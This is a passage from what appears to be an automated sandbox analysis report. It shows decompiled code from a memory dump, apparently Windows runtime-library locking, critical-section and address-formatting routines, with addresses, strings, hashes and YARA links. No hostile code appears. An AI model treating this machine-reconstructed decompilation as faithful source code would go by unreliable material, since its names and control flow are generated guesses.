												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x0097055a
0x0097055d
0x00970563
0x00970566
0x009705d8
0x009705e2
0x009705e5
0x00000000
0x009705e7
0x009705e7
0x009705ea
0x009705f3
0x009705f3
0x00970568
0x00970568
0x00970568
0x00970569
0x00970569
0x00970569
0x0097056b
0x00000000
0x00000000
0x0099217f
0x00992183
0x0099225b
0x0099225f
0x00992189
0x0099218c
0x0099218f
0x00992194
0x00992199
0x0099219d
0x009921a0
0x009921a2
0x009921ce
0x009921ce
0x009921ce
0x009921d0
0x009921d6
0x009921de
0x009921e2
0x009921e8
0x009921e9
0x009921ec
0x009921f1
0x009921f6
0x00000000
0x00000000
0x009921f8
0x009921fb
0x00992206
0x0099220b
0x0099220c
0x00992217
0x00992226
0x0099222b
0x0099222c
0x0099222f
0x00992232
0x00992235
0x00992235
0x0099223a
0x0099223f
0x00992241
0x00992243
0x00992248
0x00992248
0x0099224d
0x0099224f
0x00992262
0x00992263
0x00992268
0x00992269
0x00992269
0x00992269
0x0099226d
0x00000000
0x00000000
0x00992276
0x00992279
0x0099227e
0x00992283
0x00992287
0x0099228a
0x0099228d
0x0099228f
0x009922bc
0x009922bc
0x009922bc
0x009922be
0x009922c4
0x009922cc
0x009922d0
0x009922d6
0x009922d7
0x009922da
0x009922df
0x009922e4
0x00000000
0x00000000
0x009922e6
0x009922e9
0x009922f4
0x009922f9
0x009922fa
0x00992305
0x00992314
0x00992319
0x0099231a
0x0099231d
0x00992320
0x00992323
0x00992323
0x00992328
0x0099232d
0x0099232f
0x00992331
0x00992336
0x00992336
0x0099233b
0x0099233d
0x00992350
0x00992351
0x00992356
0x00992359
0x00992359
0x0099235b
0x0099235d
0x00955367
0x0095536b
0x00955372
0x00000000
0x00000000
0x00000000
0x00000000
0x00992363
0x00992363
0x00992369
0x0099236a
0x0099236c
0x00992371
0x00992373
0x00000000
0x00992379
0x00992379
0x0099237a
0x0099237f
0x0099237f
0x00992385
0x00992386
0x00992389
0x0099238e
0x00992390
0x00955378
0x0095537c
0x00992396
0x00992396
0x00992397
0x0099239c
0x009923a2
0x009923a3
0x009923a6
0x009923ab
0x009923ad
0x00000000
0x009923b3
0x009923b3
0x009923b4
0x009923b9
0x009923ba
0x009923ba
0x009923bc
0x009923bf
0x00000000
0x00000000
0x00989153
0x00989158
0x0098915a
0x0098915e
0x00989160
0x00000000
0x00989166
0x00989166
0x00989171
0x00989176
0x00989176
0x00000000
0x00989160
0x009923c6
0x009923ce
0x009923d7
0x009923d7
0x009923ad
0x00992390
0x00992373
0x0099233f
0x0099233f
0x00000000
0x0099233f
0x00992291
0x00992291
0x00992293
0x00992295
0x0099229a
0x009922a1
0x009922a3
0x009922a7
0x009922a9
0x00000000
0x00000000
0x009922ab
0x009922ad
0x009922af
0x00000000
0x00000000
0x00000000
0x009922af
0x009922b1
0x009922b4
0x009922b4
0x009922b6
0x009553be
0x009553be
0x009553be
0x009553c0
0x00000000
0x00000000
0x009553cb
0x009553ce
0x009553d0
0x009553d4
0x009553d6
0x00000000
0x009553d8
0x009553e3
0x009553ea
0x009553ea
0x00000000
0x009553d6
0x00000000
0x00000000
0x00000000
0x00000000
0x009922b6
0x00000000
0x0099228f
0x00992349
0x0099234d
0x00992251
0x00992251
0x00000000
0x00992251
0x009921a4
0x009921a4
0x009921a6
0x009921a8
0x009921ac
0x009921b6
0x009921b8
0x009921bc
0x009921be
0x00000000
0x00000000
0x009921c0
0x009921c2
0x009921c4
0x00000000
0x00000000
0x00000000
0x009921c4
0x009921c6
0x009921c6
0x009921c8
0x00000000
0x00000000
0x00000000
0x00000000
0x009921c8
0x009921a2
0x00000000
0x00992183
0x0097057b
0x0097057d
0x00970581
0x00970583
0x00992178
0x00000000
0x00970589
0x0097058f
0x0097058f
0x00970583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00992206

Strings

RTL: Re-Waiting, xrefs: 0099223A, 00992328
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 0099220E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009922FC
RTL: Resource at %p, xrefs: 0099221D, 0099230B

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: efbfcbcb781c49c717eee99d9d2bf1b96960968afb8ca61a8332b6834602b7ce
Instruction ID: a6f7716e77370df4fa7a39a0360d0484aacb03c5030aa2a8d9f1dff3931b0eba
Opcode Fuzzy Hash: efbfcbcb781c49c717eee99d9d2bf1b96960968afb8ca61a8332b6834602b7ce
Instruction Fuzzy Hash: C8513931704201BBEF14DB1CCC82FA673ADABD4B20F218229FD59DB285DA71EC418B90

Uniqueness

Uniqueness Score: -1.00%

Function 009714C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E009714C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xa12088; // 0x7764bdd0
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00967707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009713CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00967707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00967707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00932340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0093E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x009714c0
0x009714cb
0x009714d2
0x009714d6
0x009714da
0x009714de
0x009714e3
0x0097157a
0x0097157a
0x009714f1
0x009714f3
0x0099ea0f
0x00000000
0x0099ea15
0x00000000
0x0099ea15
0x009714f9
0x009714f9
0x009714fe
0x00971504
0x0099ea1a
0x0099ea1f
0x0099ea21
0x0099ea22
0x0099ea27
0x0099ea2a
0x0099ea2a
0x00971515
0x00971517
0x0097156d
0x00971572
0x00971575
0x00971575
0x0097151e
0x0099ea50
0x0099ea55
0x0099ea58
0x0099ea58
0x0097152e
0x00971531
0x00971533
0x00000000
0x00971535
0x00971541
0x00971549
0x00971549
0x00971533
0x009714f3
0x00971559

APIs

___swprintf_l.LIBCMT ref: 0099EA22

Part of subcall function 009713CB: ___swprintf_l.LIBCMT ref: 0097146B
Part of subcall function 009713CB: ___swprintf_l.LIBCMT ref: 00971490

___swprintf_l.LIBCMT ref: 0097156D

Strings

%%%u, xrefs: 00971564
]:%u, xrefs: 0099EA47

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: d72a235fac0a54d062d51e9e6e9ae739a62cebe402d2207db199ffa050b325b6
Instruction ID: 3cc961d281f5c07bc82adc7110169088a7c0e78603723fba4b56c73dc895440f
Opcode Fuzzy Hash: d72a235fac0a54d062d51e9e6e9ae739a62cebe402d2207db199ffa050b325b6
Instruction Fuzzy Hash: E42191B39002199BCF21DE68CC41BEAB3ACAB90704F448555FC4AD3140DB74AA588BE1

Uniqueness

Uniqueness Score: -1.00%

Function 009D3DA7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E009D3DA7(void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v11;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				void* _t19;
				void* _t29;
				void* _t32;
				void* _t33;
				intOrPtr _t34;
				void* _t39;
				intOrPtr* _t40;
				void* _t42;
				signed int _t44;
				void* _t45;

				_t39 = __edx;
				_t17 =  *0xa12088; // 0x7764bdd0
				_v8 = _t17 ^ _t44;
				_t34 = _a16;
				_t41 = _a4;
				_t40 = _a20;
				if(_a4 == 0 || _t40 == 0 || _t34 == 0 &&  *_t40 != _t34) {
					L12:
					_t19 = 0xc000000d;
				} else {
					_t21 =  &_v76;
					if(_a12 != 0) {
						_push(0x939cbe);
						_push(0x41);
						_push( &_v76);
						_t33 = E009E894A();
						_t45 = _t45 + 0xc;
						_t21 = _t44 + _t33 - 0x48;
					}
					_t42 = E009D3B8E(_t41, _t21);
					if(_a8 != 0) {
						_t32 = E009E894A(_t42,  &_v11 - _t42, "%%%u", _a8);
						_t45 = _t45 + 0x10;
						_t42 = _t42 + _t32;
					}
					if(_a12 != 0) {
						_t29 = E009E894A(_t42,  &_v11 - _t42, "]:%u", _a12 & 0x0000ffff);
						_t45 = _t45 + 0x10;
						_t42 = _t42 + _t29;
					}
					_t41 = _t42 -  &_v76 + 1;
					 *_t40 = _t41;
					if( *_t40 < _t41) {
						goto L12;
					} else {
						E00932340(_t34,  &_v76, _t41);
						_t19 = 0;
					}
				}
				return E0093E1B4(_t19, _t34, _v8 ^ _t44, _t39, _t40, _t41);
			}

0x009d3da7
0x009d3daf
0x009d3db6
0x009d3dba
0x009d3dbe
0x009d3dc2
0x009d3dc7
0x009d3e6b
0x009d3e6b
0x009d3de1
0x009d3de6
0x009d3de9
0x009d3deb
0x009d3df0
0x009d3df2
0x009d3df3
0x009d3df8
0x009d3dfb
0x009d3dfb
0x009d3e0a
0x009d3e0c
0x009d3e1d
0x009d3e22
0x009d3e25
0x009d3e25
0x009d3e2c
0x009d3e46
0x009d3e4b
0x009d3e4e
0x009d3e4e
0x009d3e55
0x009d3e58
0x009d3e5a
0x00000000
0x009d3e5c
0x009d3e5f
0x009d3e67
0x009d3e67
0x009d3e5a
0x009d3e7e

APIs

___swprintf_l.LIBCMT ref: 009D3DF3
___swprintf_l.LIBCMT ref: 009D3E1D
___swprintf_l.LIBCMT ref: 009D3E46

Strings

%%%u, xrefs: 009D3E14
]:%u, xrefs: 009D3E3D

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 65491423502e95a3cfc582c684cbdb721b58532efa3a8108655eb145acdabff7
Instruction ID: cbdb19c3336f41df71bedb5434e8f4d9e2379248b80de8bae78434634c962e5c
Opcode Fuzzy Hash: 65491423502e95a3cfc582c684cbdb721b58532efa3a8108655eb145acdabff7
Instruction Fuzzy Hash: E521C17294022AABCB10AF658C45AEF77AC9B54755F04C522FC0897281E7B49F44CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 009553A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E009553A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00a101c0;
									_push(_t92);
									_push(0);
									_t37 = E0092F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00974FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00983F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00983F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E009B217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00983F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00973915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00955384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0092F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00973915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0092F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00973915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0092F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00973915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00955329(_t74, _t92);
													_push(1);
													_t48 = E009553A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x009553ab
0x009553ae
0x009553b1
0x009553b4
0x009553b7
0x009705b6
0x009705c0
0x009705c3
0x00000000
0x009705c9
0x009705c9
0x009705cc
0x009705d5
0x009705d5
0x009553bd
0x009553bd
0x009553bd
0x009553be
0x009553be
0x009553be
0x009553c0
0x00000000
0x00000000
0x00992269
0x0099226d
0x00992349
0x0099234d
0x00992273
0x00992276
0x00992279
0x0099227e
0x00992283
0x00992287
0x0099228a
0x0099228d
0x0099228f
0x009922bc
0x009922bc
0x009922bc
0x009922be
0x009922c4
0x009922cc
0x009922d0
0x009922d6
0x009922d7
0x009922da
0x009922df
0x009922e4
0x00000000
0x00000000
0x009922e6
0x009922e9
0x009922f4
0x009922f9
0x009922fa
0x00992305
0x00992314
0x00992319
0x0099231a
0x0099231d
0x00992320
0x00992323
0x00992323
0x00992328
0x0099232d
0x0099232f
0x00992331
0x00992336
0x00992336
0x0099233b
0x0099233d
0x00992350
0x00992351
0x00992356
0x00992359
0x00992359
0x0099235b
0x0099235d
0x00955367
0x0095536b
0x00955372
0x00000000
0x00000000
0x00000000
0x00000000
0x00992363
0x00992363
0x00992369
0x0099236a
0x0099236c
0x00992371
0x00992373
0x00000000
0x00992379
0x00992379
0x0099237a
0x0099237f
0x0099237f
0x00992385
0x00992386
0x00992389
0x0099238e
0x00992390
0x00955378
0x0095537c
0x00992396
0x00992396
0x00992397
0x0099239c
0x009923a2
0x009923a3
0x009923a6
0x009923ab
0x009923ad
0x00000000
0x009923b3
0x009923b3
0x009923b4
0x009923b9
0x009923ba
0x009923ba
0x009923bc
0x009923bf
0x00000000
0x00000000
0x00989153
0x00989158
0x0098915a
0x0098915e
0x00989160
0x00000000
0x00989166
0x00989166
0x00989171
0x00989176
0x00989176
0x00000000
0x00989160
0x009923c6
0x009923cb
0x009923ce
0x009923d7
0x009923d7
0x009923ad
0x00992390
0x00992373
0x0099233f
0x0099233f
0x00000000
0x0099233f
0x00992291
0x00992291
0x00992293
0x00992295
0x0099229a
0x009922a1
0x009922a3
0x009922a7
0x009922a9
0x00000000
0x00000000
0x009922ab
0x009922ad
0x009922af
0x00000000
0x00000000
0x00000000
0x009922af
0x009922b1
0x009922b4
0x009922b4
0x009922b6
0x00000000
0x00000000
0x00000000
0x00000000
0x009922b6
0x0099228f
0x00000000
0x0099226d
0x009553cb
0x009553ce
0x009553d0
0x009553d4
0x009553d6
0x00000000
0x009553d8
0x009553e3
0x009553ea
0x009553ea
0x009553d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009922F4

Strings

RTL: Re-Waiting, xrefs: 00992328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009922FC
RTL: Resource at %p, xrefs: 0099230B

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 431f5f37eff6e6866758aae2adaa7301ae9b521a2a067aa30cccb56e0d2d7dff
Instruction ID: ed214f16709c1dbc9a25354e96df8bbc6c88fa557eee21e31570ccd2673c7259
Opcode Fuzzy Hash: 431f5f37eff6e6866758aae2adaa7301ae9b521a2a067aa30cccb56e0d2d7dff
Instruction Fuzzy Hash: E6512871600701BBDF14DB29DC91FA673ACEF94760F114229FD18DB282EA71ED458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0095EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0095EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0094DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xa1793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E009316C0(_t39);
				} else {
					_t40 = E0092F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00973915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E009301A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xa1793c; // 0x0
								_push(_t85);
								_t44 = E00931F28(_t71);
							} else {
								_t44 = E0092F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00973915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E009B2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0095EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00974FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00983F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00983F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xa120c0;
								if(_t85 != 0xa120c0) {
									_t76 = _a4;
